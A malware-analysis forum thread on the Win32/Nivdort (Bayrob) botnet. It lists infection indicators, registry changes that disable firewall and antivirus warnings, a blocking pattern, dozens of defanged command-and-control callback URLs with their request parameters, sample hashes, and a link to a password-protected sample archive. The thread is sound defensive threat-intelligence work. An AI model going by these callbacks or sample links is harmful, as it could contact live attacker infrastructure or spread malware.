Win32/Nivdort

Forum for analysis and discussion about malware.

Win32/Nivdort

Postby unixfreaxjp » Wed Nov 06, 2013 1:16 pm

I couldn't find this topic. so first pls allow me to post the malware base information (based on 2 month tracking this botnet)

Variant Name:
Code: Select all
Win32/Nivdort
sometimes as Win32/Bayrob or as Symmi < very confusing..

Typical characteristic to quick identify this threat:
Code: Select all
//autostart..
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\**etc etc

// usual kick up service..
SERVICES_ACTIVE_DATABASE

// overwrite hosts (in unix is /etc/hosts) ...
C:\WINDOWS\system32\\drivers\etc\hosts

// exe in temp....
C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\zvostv1nl1hdgydpehn.exe (random example)

// exe implanted...
C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\zmgbnushjwx.exe
C:\WINDOWS\system32\zmgbnushjwx(random example).exe

// accessing path like:
C:\WINDOWS\system32\pouuifospsdv(random example)\tst
C:\WINDOWS\system32\pouuifospsdv(random example)\lck
C:\WINDOWS\system32\pouuifospsdv(random example)\upd
C:\WINDOWS\system32\pouuifospsdv(random example)\etc
C:\WINDOWS\system32\pouuifospsdv(random example)\run

// tweaked infected PC security level:
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallOverride (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusOverride (1)

//And your internet/proxy setting...
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = "1"
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy (1)
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings (1)

// ..obviously to open a  proxy in 80
$cat %UserProfile%\Application Data\Mozilla\Firefox\Profiles\[CURRENT PROFILE]\user.js
user_pref("network.proxy.type", 0);

Sniffed information (stealing purpose):
Code: Select all
*.ebay.com
*.ups.exe
*.escrow.com

Botnet Command:
Code: Select all
//Requests (Details is in Botnet Callbacks PoC section):
method= validate (&mode=sox,email), ping, cfg, var-ip,
        setvar (&key=cpuinfo&value=%CPU%),
         checkport (&port=51573), all&flag

rsid=infected/HostID
sox=IP Address in Hex
v=VERSION_NUMBER ; or; ver=VERSION_NUMBER(001-013)

BotNet sent value (FLAGS)
Code: Select all
lport=0,1
slots=0,1
spm=0,1 // noted this flag exist.. suspected spam functions

Mitigation string for blocking purpose(not a regex, be noted):
Code: Select all
*/forum/search.php?method=*

Botnet Callbacks PoC:
Code: Select all
h00p://lookloss.net/forum/                     search.php?method=validate&mode=my&email=EMAIL-ADDR@DOMAIN.COM&lici=auto_000860&ver=013

h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=002&sox=2521d800
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://signform.net/forum/                     search.php?method=validate&mode=sox&v=000&sox=2c453000

h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01

h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://elementarimagine.com/forum/             search.php?method=ping&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=cfg&oknet&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=var-ip&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3184+MHz)
                                                         &mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=stopped&value=2cb48400
                                                         &mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=2cb48400&slots=0&spm=0
                                          
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://palsticsurgery-community.com/forum/     search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://spumkaguga.com/forum/                   search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://gadgets-small-talk-community.com/forum/ search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://palsticsurgery-community.com/forum/     search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01

h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://elementarimagine.com/forum/             search.php?method=ping&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=cfg&oknet&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=var-ip&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)
                                                        &mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://dominoclub-grup.com/forum/              search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/             search.php?method=all&flag&mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/             search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)
                                                         &mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=005&sox=2c905800
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=checkport&port=51573&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0

h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://faircross.net/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602

h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=all&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0

Recent Sample Investigated:
Code: Select all
https://www.virustotal.com/en/file/b8b93f40046495d44c6855a1c86c9357a030023c914d298bb9b60551b21d79b3/analysis/
https://www.virustotal.com/en/file/eea059174127860154f4dce1a7d8995a9a5056febf73819d63ddadb522ed6c8f/analysis/
https://www.virustotal.com/en/file/07d753966944f8425453bf201c51873abc67f674d9582bcc90e4532efeea67c6/analysis/
https://www.virustotal.com/en/file/ae6a43cc8b47819407b5e8852bdf554be8f1ad0364345963bfd44b3c3cdb9556/analysis/
https://www.virustotal.com/en/file/416d3eda1483e0addbcba0218750f75a90c569ba4cf5e2227e1d909fdf93d630/analysis/
https://www.virustotal.com/en/file/c4b29278fc90c4e87a1d3d524c96373f7326726b9c653b5d62d4555265ec7215/analysis/
https://www.virustotal.com/en/file/12a24575409c67c2860e58adba8333c70c8cc5f8a53f3910463323af7c7aca40/analysis/
https://www.virustotal.com/en/file/39598e475d12e492c1b7d2c1091c5ec040d3c8365d4825140a3cb743799e57c3/analysis/
https://www.virustotal.com/en/file/a9e2fe1dbb39902ff1cf2bcaabcf5676418c4dced3ddc18db680c7459dd9ab9c/analysis/
https://www.virustotal.com/en/file/e9ec6e9b74e5405a7427a8aee7beb4c522d2b97275fb19026bd8a33898f60249/analysis/
https://www.virustotal.com/en/file/2fa162050b6cf23feec40931b6b8f10f9addc3d00b2a8ab4c95c9c71bcfced96/analysis/
https://www.virustotal.com/en/file/37286961d40a37586e005ce6d9a9e88257d6299a2091802afa4ab2f21b875497/analysis/
https://www.virustotal.com/en/file/2fb070d0313b02008075a806455353367a95d49a077332a075c161b97726204a/analysis/
https://www.virustotal.com/en/file/484994eaa8da3e419e5e175a47020ffdb41aee38f13d9aa45c2c614a297c42a1/analysis/
Last edited by unixfreaxjp on Wed Nov 06, 2013 1:56 pm, edited 7 times in total.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Win32/Nivdort

Postby unixfreaxjp » Wed Nov 06, 2013 1:29 pm

You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Win32/Nivdort

Postby mysarun88 » Fri Jul 24, 2015 11:24 am

Hi,
Can someone explain the Why is there so many Threads getting created? Is it an anti-debugging technique.
mysarun88
 
Posts: 1
Joined: Thu Sep 04, 2014 5:19 am
Reputation point: 0

Re: Win32/Nivdort

Postby gandolf » Tue Aug 04, 2015 10:12 pm

Like you, I also get confused with the nomenclature used for this malware and I did some work on it as well past week or so.

It has a DGA algorithm it uses to contact the CnC servers.
Another interesting thing some samples I've analyzed do is drop several dropped payloads, some which seem to indicate it is a bitcoin miner. I've attached all the dropped files from the sample I analyzed. I'll say more after I return from BH conf.

Original (copied) executable is included in archive (nkzwkphlco)

Archive can't be attached for some reason:
https://www.dropbox.com/s/ktlb79uq3z7cj ... d.zip?dl=0

pw:infected

mysarun88: I had the same curiosity about the thread flooding, each time its called the thread is passed a new value. It could just be an anti-debugger/analysis technique. Although I did notice that when debugging the process will kill itself and respawn after some idle time inside a debugger. These Threads could be counters to track for debugging.
You do not have the required permissions to view the files attached to this post.
Last edited by Xylitol on Fri Aug 28, 2015 10:15 am, edited 1 time in total.
Reason: Attached the files (without .idb)
gandolf
 
Posts: 2
Joined: Fri Nov 08, 2013 2:55 pm
Reputation point: 0

Re: Win32/Nivdort

Postby zedbergeron » Fri Aug 28, 2015 6:58 am

What's with the multiple thread - It tries to compute a hash that will eventually be the correct address where it will jump to malware code.
zedbergeron
 
Posts: 1
Joined: Fri Aug 28, 2015 6:54 am
Reputation point: 0

Re: Win32/Nivdort

Postby benkow_ » Tue Jan 19, 2016 9:13 am

Some sample grabbed by email this week.
8f67833b8e3bc4c2d5b6c394e3deb2ea23ed8a1d3106d26e1c7ee09c245a770d
5b7d045def5f2f85384a82ebddd13d4396215b4752a3da9e66255fb355d36a39
e679fdae883e53e5ab3772fc6ff1369f499c1a4490130d8c9c4bb387c390a98b
6b62df8fb1cfcfce4094dcea909ba3f8b196ec74e98a6f310da3862e762a0893
84fc45d569228b97faf52dbb7ebb9effd8a6f85ce0e265883944c3043237c369
386bf02fa4b44bfa18e7c3c0a2daa7616a800a1fc677c1267fff4dd693283e3f
You do not have the required permissions to view the files attached to this post.
benkow_
 
Posts: 70
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 44

Re: Win32/Nivdort

Postby malwareanalysyss » Mon Dec 19, 2016 9:30 am

Bayrob: Three suspects extradited to face charges in US
https://www.symantec.com/connect/blogs/bayrob-three-suspects-extradited-face-charges-us
I will monitor number of nivdort/bayrob samples on VT.
malwareanalysyss
 
Posts: 1
Joined: Wed Sep 18, 2013 8:48 am
Reputation point: 0


Return to Malware

Who is online

Users browsing this forum: No registered users and 9 guests